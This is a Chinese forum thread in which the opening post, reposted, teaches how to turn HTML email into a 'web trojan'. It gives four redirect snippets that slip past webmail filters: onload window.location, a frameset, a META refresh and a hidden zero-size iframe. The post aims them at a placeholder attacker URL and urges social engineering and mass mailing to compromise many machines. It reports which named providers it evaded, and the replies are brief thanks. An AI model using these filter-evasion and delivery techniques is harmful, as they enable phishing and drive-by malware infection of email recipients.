请选择 进入手机版 | 继续访问电脑版
查看: 376|回复: 4

网页邮箱木马,(转载)。一起分享,没时间自己打字。各位看看,大佬勿喷。

[复制链接]
  • TA的每日心情
    擦汗
    前天 09:23
  • 签到天数: 41 天

    [LV.5]常住居民I

    发表于 2022-3-13 09:33:05 来自手机 | 显示全部楼层 |阅读模式
    大家肯定对网页木马 已经很熟悉了,但大 家可能对邮件网页木马还不 是很熟悉。其实这个也许有些高手以前已经发现并使用很久了。但我 一直未见网上及杂志上有此方面的内容。这里我就以技术共享的原则 跟大家谈谈邮件网页木马的思路及实现方法。

    邮件网页木马的危害巨大,它能化被动为主动。目前网络 上流行的网 页木马其实是很被动的,它需要被害者点击目标 网址。随着现在网民 的安全 观念的增强,网民一 般不会轻易点击陌生的网址。但邮件网页 木马就不一样了,你可以将电子邮件发送到你想要攻 击 的目标信箱。 只要你根据社会工程学及心理学的知识,将邮件的标题看上去不明显像 是垃圾邮件或广告,那么接收者肯定会 点击此邮件的。只要他点击了 此邮件主题,看了信,哈哈,他就中招了!当然你也可以通过邮件群 发器,这样的话,传播速率比普通的网页木马以及电子书木马不知 高多 少呢!而且它有个最大的优点,那就是具有目标可指定性。它可以攻击你 想要的指定用户。这一点是普通方法无法比拟的。

    邮件网页木马其实 就是在发E-mail以HTML方式内嵌网页木马,使邮 件本身成为一张网页木马。到这时你也许回大呼,我怎么没想到啊! 呵呵,不怕做不到,只怕想不到啊。 其实有些技术本身并不难,但就 是怕不往这方面想啊。我还是赶快转入正题吧,否则,坏柿子扔过来 啦!闪!

    聪明的你此时可能会说,邮件网页木 马岂不是很简单啊,只要在发邮 件是选择以HTML方式发送,再将网页木马的源代码写入即可。事实 上当然没这么简单,因为国内的绝大部分电子信箱都对其中一 些关键 代码进行的屏蔽过滤。因而本文将重点研究怎样突破重围,在电子邮 件中引入网页木马,达到我们的目的。

    一般的网页木马都用到 javasccript,但绝大部分邮件系 统 都对 <script>标记作了屏蔽。从而我们只能另辟新法。我们可以不直接将 网页木马的代码写入邮件 中,因为如果写入的话,有关代码会被屏 蔽,网页木马将失效。我们可以写入转向代码,使用户浏览此邮件时 转向我们放在自己网站上的网页木马。当然,邮件网页 木马的难点就 在转向代码。写转向代码要有讲究,因为写得不巧妙的话,代码将会 被邮件系统屏蔽。

    下面笔者来谈谈几种有效的可以在电子邮件中 引入网页木马的且没被 邮件服务器 屏蔽 的转向代码。因为绝大部分邮件系统都对<script>标 记作了屏蔽,所以为了转向代码有效,均不使用JS和VBS标记。

    1. window.location 法,代码如下

    <body nload="window.location='http://xxxxx';"></body>

    2. 框架法,代码如下

    <frameset cols="100%,*">

    <frame. src="http://xxxxx" scrolling="auto">

    </frameset>

    其 中scrolling参数值得注意,合理使用可加强隐蔽性。Cols参数可根 据自己的实际情况作更改。

    3. META标志法,代码如下

    <META. HTTP-EQUIV="Refresh" CONTENT="0;URL= http://xxxxx">

    其中CONTENT后面的阿拉伯数字是代表过 几秒中钟转入目标网页。

    4. iframe内帧法

    <iframe. src="http://xxxxx" width="0" height="0" frameborder="0">

    其中 width="0" height="0"是引入网页的大小尺寸,可以根据你的实 际需要加以调整。其中的frameborder参数也很重要,如果使用的恰 当的话,可以增强邮 件网页木马的隐蔽性。为了大家看的清楚,我将 widt和height均设置的非零数值,转向的是网易的首页(如果转向的 是放在自己网站上的网页木马,呵 呵......)。图1是设置 frameborder=1的效果,图2是设置为frameborder=0的效果。

    大家由上面两幅图即可 知道,如果设置为frameborder=1,邮件中可 看见邮件服务器自动加带的页脚广告。而设置为frameborder=0,则 如图2所示,它不像普 通的信件一样看见邮件服务器自动加带的广 告。大家可根据具体情况选择frameborder参数来获得最好的伪装引 入效果,使对方感觉不到他所浏览的邮件 是已经转向到你的网站上的 网页木马.

    上述代码笔者已经对国内的几乎所有电子信箱作了测试,如网易,搜 狐,新浪,亿唐,21CN,TOM等 等。以上四种方法各有千秋。第一 种方法的适应范围最小。比如网易、亿唐都屏蔽了它。但第2、3、4 方法在国内的信箱测试中均通过。尤其第2、3种方法几乎 百试百灵。 当然第4种方法也很经典,参数多,隐蔽性强。大家可根据不同的目标 信箱选择最有效的转向引入代码。

    现在只要大家会制作网页木马 (关于网页木马木马的制作方法,大家 可以参见以往的黑防),拥有了性能优秀的后门程序或木马程序,再 配合本文所讲的邮件木马引入技术的话,贪心的再来个邮 件群发,呵 呵,你必将为所欲为,肉鸡成群。而且,这种方法具有攻击目标可指 定性的优点!一场暴风雪即将来临!大家以后还是少在公开场合公布 信箱哟!当然, 稳妥的措施是邮件服务器实行严格个代码过滤,用户 将邮件查看方式设置为以文本方式查看!

    后记:笔者顺便还对几个国外著名的邮 箱:hotmail以及Yahoo作了 测试,发现它们过滤得都非常严格。上述的4种方法的代码都被过滤 了。此时我深感国内邮件提供商与国外的差距。安全观 念的差距!但 hotmail以及Yahoo并不是固若金汤。以色列网络安全 公司GreyMagic Software已经发现hotmail以及Yahoo邮箱也存在过滤不严的漏 洞 。 我们可以用同步多媒体集成语言的(SMIL)的HTML+TIME技术来突 破屏蔽,实现转向引入网页木马的目的。 庆幸的是此漏洞最近已经被 hotmail以及Yahoo修补。但国内的几乎所有电子信箱均存在此漏洞。 当然深爱钻研技术的你肯定会问,现在是否有针对 hotmail以及 Yahoo邮箱的有效的转向引入代码。答案是肯定的!这个问题留给大 家思考,大家可以向xml方向去发散,相信你一定会找到的!
    回复

    使用道具 举报

  • TA的每日心情
    擦汗
    前天 09:23
  • 签到天数: 41 天

    [LV.5]常住居民I

     楼主| 发表于 2022-3-13 09:35:18 来自手机 | 显示全部楼层
    鄙人:各位师兄,我不是侵权啊。有转载,我这技术共享,免得师兄们到出去找。
    回复 支持 反对

    使用道具 举报

  • TA的每日心情

    2022-4-17 09:20
  • 签到天数: 27 天

    [LV.4]偶尔看看III

    发表于 2022-3-13 13:48:05 | 显示全部楼层
    的确没听过网页木马
    回复 支持 反对

    使用道具 举报

  • TA的每日心情
    开心
    3 天前
  • 签到天数: 9 天

    [LV.3]偶尔看看II

    发表于 2022-5-3 00:09:52 | 显示全部楼层
    学到了
    回复 支持 反对

    使用道具 举报

    您需要登录后才可以回帖 登录 | 注册

    本版积分规则

    快速回复 返回顶部 返回列表